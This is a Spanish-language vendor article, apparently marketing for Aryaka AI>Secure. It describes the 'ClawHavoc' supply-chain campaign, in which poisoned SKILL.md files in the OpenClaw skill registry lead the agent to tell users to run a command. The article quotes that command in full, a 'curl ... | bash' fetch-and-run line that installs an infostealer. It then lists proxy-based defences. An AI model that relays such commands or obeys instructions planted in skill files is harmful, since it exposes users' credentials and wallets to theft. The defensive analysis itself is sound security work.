
Desde febrero de 2026, OpenClaw (antes Clawdbot y Moltbot ) es una plataforma popular para agentes autónomos de IA. Su arquitectura «soberana», que da a la IA acceso directo a los sistemas de archivos y terminales, aumenta significativamente su superficie de ataque, lo que conlleva riesgos elevados, ilustrados de forma más notable por la campaña de la cadena de suministro ClawHavoc, que expuso miles de despliegues a un compromiso potencial.
Este artículo repasa las vulnerabilidades de OpenClaw y explica cómo Aryaka AI>Secure proporciona una mitigación de riesgos sólida y de múltiples capas.
Vulnerabilidades de OpenClaw y el contexto de ClawHavoc
OpenClaw es vulnerable debido a tres factores principales:
- Acceso a nivel del sistema: Los agentes pueden ejecutar comandos shell y acceder a las credenciales.
- Ingestión no fiable: Los agentes procesan contenidos de terceros, exponiéndolos a una inyección puntual.
- Comunicación autónoma: Los agentes pueden enviar datos al exterior sin supervisión.
ClawHavoc es un ataque a la cadena de suministro que se aprovechó de este ecosistema. En febrero de 2026, los investigadores descubrieron que alrededor del 12% de las habilidades de ClawHub eran maliciosas, disfrazadas de herramientas útiles pero que en realidad robaban identidades digitales.
Cómo funciona ClawHavoc: La anatomía de una infección
ClawHavoc es un ataque de ingeniería social que explota la forma en que OpenClaw ingiere instrucciones. Sigue una cadena de muerte repetible y muy eficaz:
- Paso 1: El manifiesto envenenado (SKILL.md): Los atacantes suben una habilidad a ClawHub. El núcleo del ataque es el archivo SKILL.md. Incluye una sección de «Requisitos previos» que indica al agente (y al usuario) que se debe ejecutar un script específico para «inicializar» la herramienta.
- Paso 2: Ingeniería social a través del LLM: Cuando le pide a su agente que utilice la habilidad, éste lee el SKILL.md malicioso en su contexto. El LLM genera entonces una respuesta que suena útil: «Para activar esta función, ejecute este comando en su terminal: curl -sL https://glot.io/raw/snippet | bash».
- Paso 3: Entrega de la carga útil del malware: Si el usuario ejecuta el comando, descarga una carga útil de segunda etapa -típicamente Atomic Stealer (AMOS) o un keylogger. Este malware asalta las cookies del navegador, los llaveros y los archivos de entorno OpenClaw en busca de claves API y monederos criptográficos.
Utilizando Aryaka AI>Secure para detener a ClawHavoc
Como proxy MITM de paquetes profundos y consciente de la IA, Aryaka AI>Secure intercepta el tráfico en cada etapa de la cadena de ataque ClawHavoc.
Método 1: Bloquear la descarga de habilidades maliciosas
Cuando un usuario ejecuta clawhub install, AI>Secure descifra el tráfico HTTPS del registro.
- La protección: No se limita a ver un archivo; analiza el contenido Markdown del SKILL.md. Utiliza la inspección semántica para identificar «Instrucciones Tóxicas», como comandos ocultos del shell o enlaces a sitios conocidos de intercambio de fragmentos utilizados en la campaña ClawHavoc.
- El resultado: Bloquea la descarga en el borde de la red, impidiendo que las instrucciones maliciosas lleguen nunca a la memoria del agente.
Método 2: Filtrado semántico de respuestas (Defensa de instrucciones)
Si una mala habilidad ya está en su máquina, AI>Secure proporciona una segunda capa de defensa inspeccionando la salida del LLM.
- La protección: Cuando el LLM le dice al usuario «Ejecute este script para activar la herramienta», el motor semántico de AI>Secure reconoce esto como «Fraude de instalación». Identifica que la IA está siendo manipulada para engañar a un humano en una acción peligrosa.
- El resultado: El proxy redacta el comando del flujo de chat o bloquea el mensaje por completo, sustituyéndolo por una advertencia de seguridad en la interfaz del usuario.
Método 3: Filtrado proactivo de URL y SWG (defensa de la carga útil)
Si el usuario intenta ejecutar manualmente un comando curl malicioso o descargar un ZIP «prerrequisito», interviene la funcionalidad Secure Web Gateway (SWG) de AI>Secure.
- La protección: AI>Secure utiliza una fuente de inteligencia de URL en tiempo real para rastrear los dominios de phishing y la infraestructura de alojamiento de malware.
- El resultado: Cuando el agente o el usuario intentan llegar a la URL específica que aloja la carga útil del malware (como glot.io o webhook.site), el proxy identifica el destino como «malicioso» o «de alto riesgo» y anula la solicitud al instante. De este modo se evita que el malware real llegue a descargarse.
Método 4: Herramienta de tiempo de ejecución y bloqueo de datos
Si el malware consigue ejecutarse, AI>Secure actúa como último guardián de sus datos.
- La protección: Comprende las llamadas MCP (Model Context Protocol). Si un agente infectado intenta ejecutar un comando shell para exfiltrar datos, AI>Secure identifica el destino anómalo.
- El resultado: Su Next-Gen DLP (Prevención de Pérdida de Datos) escanea todos los datos salientes en busca de «Secretos» (claves API, cabeceras SSH). Si ve que sus credenciales privadas salen de la red, termina la sesión y alerta al equipo de seguridad.
Conclusión
La crisis de ClawHavoc demuestra que, para los agentes autónomos, la prontitud y la habilidad manifiestas son los nuevos perímetros. Si aprovecha un proxy centrado en la IA como Aryaka AI>Secure, se asegurará de que su agente OpenClaw siga siendo una herramienta de productividad y no una puerta de entrada para los atacantes.